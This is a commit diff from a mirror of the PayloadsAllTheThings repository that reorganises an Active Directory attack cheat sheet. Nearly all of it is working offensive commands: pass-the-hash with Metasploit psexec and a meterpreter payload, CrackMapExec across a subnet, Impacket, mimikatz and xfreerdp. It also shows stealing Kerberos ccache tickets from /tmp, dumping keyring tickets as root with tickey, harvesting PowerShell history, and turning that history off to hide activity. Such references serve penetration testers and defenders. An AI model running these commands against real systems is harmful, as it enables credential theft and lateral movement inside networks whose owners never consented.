mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Active Directory update
This commit is contained in:
parent
175c676f1e
commit
44735975a5
3 changed files with 47 additions and 32 deletions
|
@ -1506,35 +1506,31 @@ Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.
|
||||||
|
|
||||||
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
|
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
|
||||||
|
|
||||||
```powershell
|
* Metasploit
|
||||||
use exploit/windows/smb/psexec
|
```powershell
|
||||||
set RHOST 10.2.0.3
|
use exploit/windows/smb/psexec
|
||||||
set SMBUser jarrieta
|
set RHOST 10.2.0.3
|
||||||
set SMBPass nastyCutt3r
|
set SMBUser jarrieta
|
||||||
# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
|
set SMBPass nastyCutt3r
|
||||||
# NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
|
# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
|
||||||
set PAYLOAD windows/meterpreter/bind_tcp
|
# NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
|
||||||
run
|
set PAYLOAD windows/meterpreter/bind_tcp
|
||||||
shell
|
run
|
||||||
```
|
shell
|
||||||
|
```
|
||||||
or with crackmapexec
|
* CrackMapExec
|
||||||
|
```powershell
|
||||||
```powershell
|
cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
|
||||||
cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
|
```
|
||||||
also works with net range : cme smb 10.2.0.2/24 ...
|
* Impacket suite
|
||||||
```
|
```powershell
|
||||||
|
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
|
||||||
or with psexec
|
```
|
||||||
|
* Windows RDP and mimikatz
|
||||||
```powershell
|
```powershell
|
||||||
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
|
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863
|
||||||
```
|
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the users ntlm hash> /run:"mstsc.exe /restrictedadmin"
|
||||||
|
```
|
||||||
or with the builtin Windows RDP and mimikatz
|
|
||||||
```powershell
|
|
||||||
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"
|
|
||||||
```
|
|
||||||
|
|
||||||
You can extract the local **SAM database** to find the local administrator hash :
|
You can extract the local **SAM database** to find the local administrator hash :
|
||||||
|
|
||||||
|
@ -2625,15 +2621,30 @@ Navigate to any web application that is integrated with our AAD domain. Once at
|
||||||
|
|
||||||
### CCACHE ticket reuse from /tmp
|
### CCACHE ticket reuse from /tmp
|
||||||
|
|
||||||
List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache`
|
|
||||||
|
|
||||||
> When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions
|
> When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions
|
||||||
|
|
||||||
|
List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ ls /tmp/ | grep krb5cc
|
||||||
|
krb5cc_1000
|
||||||
|
krb5cc_1569901113
|
||||||
|
krb5cc_1569901115
|
||||||
|
|
||||||
|
$ export KRB5CCNAME=/tmp/krb5cc_1569901115
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### CCACHE ticket reuse from keyring
|
### CCACHE ticket reuse from keyring
|
||||||
|
|
||||||
Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/TarlogicSecurity/tickey
|
Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/TarlogicSecurity/tickey
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
# Configuration and build
|
||||||
|
git clone https://github.com/TarlogicSecurity/tickey
|
||||||
|
cd tickey/tickey
|
||||||
|
make CONF=Release
|
||||||
|
|
||||||
[root@Lab-LSV01 /]# /tmp/tickey -i
|
[root@Lab-LSV01 /]# /tmp/tickey -i
|
||||||
[*] krb5 ccache_name = KEYRING:session:sess_%{uid}
|
[*] krb5 ccache_name = KEYRING:session:sess_%{uid}
|
||||||
[+] root detected, so... DUMP ALL THE TICKETS!!
|
[+] root detected, so... DUMP ALL THE TICKETS!!
|
||||||
|
@ -2794,4 +2805,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||||
* [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html)
|
* [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html)
|
||||||
* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/)
|
* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/)
|
||||||
* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab#Previous%20Work)
|
* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab#Previous%20Work)
|
||||||
* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)
|
* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)
|
||||||
|
* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/)
|
|
@ -541,6 +541,8 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
||||||
|
|
||||||
### Powershell History
|
### Powershell History
|
||||||
|
|
||||||
|
Disable Powershell history: `Set-PSReadlineOption -HistorySaveStyle SaveNothing`.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||||
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||||
|
|
|
@ -292,6 +292,7 @@ Abuse RDP protocol to execute commands remotely with the following commands;
|
||||||
|
|
||||||
# pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
# pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
||||||
# pass the hash works for Server 2012 R2 / Win 8.1+
|
# pass the hash works for Server 2012 R2 / Win 8.1+
|
||||||
|
# require freerdp2-x11 freerdp2-shadow-x11 packages instead of freerdp-x11
|
||||||
root@payload$ xfreerdp /v:10.0.0.1 /u:username /d:domain /pth:88a405e17c0aa5debbc9b5679753939d
|
root@payload$ xfreerdp /v:10.0.0.1 /u:username /d:domain /pth:88a405e17c0aa5debbc9b5679753939d
|
||||||
```
|
```
|
||||||
* [SharpRDP](https://github.com/0xthirteen/SharpRDP)
|
* [SharpRDP](https://github.com/0xthirteen/SharpRDP)
|
||||||
|
|
Loading…
Reference in a new issue